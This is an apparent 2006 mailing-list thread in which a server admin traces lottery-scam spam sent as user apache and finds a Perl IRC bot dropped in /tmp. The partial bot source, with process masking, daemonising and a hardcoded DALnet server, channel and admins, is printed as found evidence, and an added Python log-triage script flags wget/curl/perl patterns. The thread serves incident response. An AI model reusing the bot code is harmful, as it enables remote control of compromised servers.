Re: Postfix Problems

CodeHeads wrote:
There is something wrong but I cannot nail it down.

I am receiving hundreds of bounce backs from the web server I am running.  Not
sure how they are sending mail.  The only mail that should be sent is from
forms.  Here is a header of one of queues.  Maybe someone has run into this.

V8
T1147739033
K1147739138
N1
P34672
Mhost map: lookup (zdnetmail.com): deferred
F8bs
$_apache@localhost
${daemon_flags}c u
Sapache
Aapache@xxxxxxxxxxxxxx
rRFC822; galactica7@xxxxxxxxxxxxx
RPFD:galactica7@xxxxxxxxxxxxx
H?P?Return-Path: <<81>g>
H??Received: (from apache@localhost)
        by code-heads.com (8.13.4/8.13.4/Submit) id k4G0NrpQ017524;
        Mon, 15 May 2006 20:23:53 -0400
H?D?Date: Mon, 15 May 2006 20:23:53 -0400
H?x?Full-Name: Apache
H?M?Message-Id: <200605160023.k4G0NrpQ017524@xxxxxxxxxxxxxx>
H??To: galactica7@xxxxxxxxxxxxx
H??Subject: WINNING NOTIFICATION
H??From: NATIONAL LOTTERY <claimsagent_2006_2007@xxxxxxxxxxx>

What is bothering me is this:
by code-heads.com (8.13.4/8.13.4/**Submit**) id k4G0NrpQ017524;

Right, that should tell you that the mail headers you are looking at seem to be generated by something running as user apache (probably a CGI/PHP script of some kind running via your web server), which is calling the local sendmail on that server to send the mail out. It's nothing to do with postfix at all.

Sorry again, but looky what I found in the /tmp dir:
The whole thing is not copied and pasted:
#!/usr/bin/perl
# r00t teh pl4net! gr33t t0 Myhack@DALnet
# ------[eof]-----



system("kill -9 `ps ax |grep /var/tmp/wops/is |grep -v grep|awk '{print
$1;}'`");


my $processo = 'httpd';

# morgan the code that you need to rip ends here

my @titi = ("Cube-|");

my $sleep='5';
my $linas_max='4';
my @adms=("apaii","KingFighter");
my @hostauth=("roundtable.cif.rochester.edu","202.142.215.209");
my @canais=("#conn");
my $nick=  $titi[rand scalar @titi];
my $ircname =  $titi[rand scalar @titi];
chop (my $realname = $titi[rand scalar @titi]);

$servidor='rumble.dal.net' unless $servidor;
my $porta='6667';
my $VERSAO = '0.5';
$SIG{'INT'} = 'IGNORE';
$SIG{'HUP'} = 'IGNORE';
$SIG{'TERM'} = 'IGNORE';
$SIG{'CHLD'} = 'IGNORE';
$SIG{'PS'} = 'IGNORE';
use IO::Socket;
use Socket;
use IO::Select;
chdir("/");
$servidor="$ARGV[0]" if $ARGV[0];
$0="$processo"."\0"x16;;
my $pid=fork;
exit if $pid;
die "Problema com o fork: $!" unless defined($pid);

our %irc_servers;
our %DCC;
my $dcc_sel = new IO::Select->new();

$sel_cliente = IO::Select->new();
sub sendraw {
  if ($#_ == '1') {
    my $socket = $_[0];
    print $socket "$_[1]\n";
  } else {
      print $IRC_cur_socket "$_[0]\n";
  }
}

sub conectar {
   my $meunick = $_[0];
   my $servidor_con = $_[1];
   my $porta_con = $_[2];

   my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp",
PeerAddr=>"$servidor_con", PeerPort=>$porta_con) or return(1); if
(defined($IRC_socket)) { $IRC_cur_socket = $IRC_socket;

What I cannot understand is how someone can upload to the tmp dir.  I guess I
am still learning.  Can someone shed some light on this?

This is communicating with an IRC server, probably to listen for commands.

Look at the owner of the script. If it's apache, you can safely say that a webserver exploit was used to upload it. You could try looking at the timestamp of the file, and look in your web server log files for suspicious activity at around that time to get a clue as to how it got there.

If you have /tmp on a separate partition, I'd seriously consider mounting it noexec,nodev. If it's not a separate partition, I'd seriously consider making one for it on an Internet-exposed web server. Same goes for /var.

Paul.
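The triage Paul describes (take the dropped file's timestamp, then look through the web server log for activity around that time) as an added example, not code from the thread: it assumes Apache "combined" log format, and the file mtime, hosts and log lines are constructed for the demonstration.

```python
import os
import re
from datetime import datetime, timedelta, timezone

# Apache "combined" format: host ident user [time] "request" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<agent>[^"]*)"'
)
APACHE_TIME = "%d/%b/%Y:%H:%M:%S %z"

# Things a responder usually looks for near the drop time: POSTs to scripts,
# or requests/User-Agents that mention temp dirs, download tools or interpreters.
SUSPICIOUS = re.compile(r"(?i)(/tmp/|/var/tmp/|wget|curl|perl|\bcmd=)")

def file_mtime(path):
    """Modification time of the dropped file, as an aware datetime (from stat)."""
    return datetime.fromtimestamp(os.stat(path).st_mtime, tz=timezone.utc)

def parse_line(line):
    """Parse one combined-format line; return None for lines that do not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    entry["time"] = datetime.strptime(entry["time"], APACHE_TIME)
    return entry

def requests_near(lines, mtime, window=timedelta(minutes=5)):
    """Entries whose timestamp lies within +/- window of the file's mtime."""
    hits = []
    for line in lines:
        entry = parse_line(line)
        if entry and abs(entry["time"] - mtime) <= window:
            hits.append(entry)
    return hits

def flag(entry):
    """True if the request looks like script abuse rather than normal browsing."""
    text = entry["request"] + " " + entry["agent"]
    return entry["request"].startswith("POST ") or bool(SUSPICIOUS.search(text))

# Constructed sample: a dropped-file mtime (what file_mtime() would return) and four log lines.
FILE_MTIME = datetime(2006, 5, 15, 20, 22, 0, tzinfo=timezone(timedelta(hours=-4)))
SAMPLE_LOG = """\
10.0.0.5 - - [15/May/2006:20:10:02 -0400] "GET /index.html HTTP/1.1" 200 1834 "-" "Mozilla/5.0"
10.0.0.9 - - [15/May/2006:20:21:40 -0400] "GET /forms/mail.php?attach=/var/tmp/wops/is HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [15/May/2006:20:22:07 -0400] "POST /forms/mail.php HTTP/1.1" 200 33 "-" "libwww-perl/5.805"
10.0.0.5 - - [15/May/2006:21:05:11 -0400] "GET /about.html HTTP/1.1" 200 902 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for e in requests_near(SAMPLE_LOG.splitlines(), FILE_MTIME):
        print("SUSPECT" if flag(e) else "       ", e["time"], e["host"], e["request"])
```

On a real box, replace FILE_MTIME with file_mtime("/tmp/<script>") and feed the access log lines in; a wider window is sensible if the log and file clocks might disagree.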

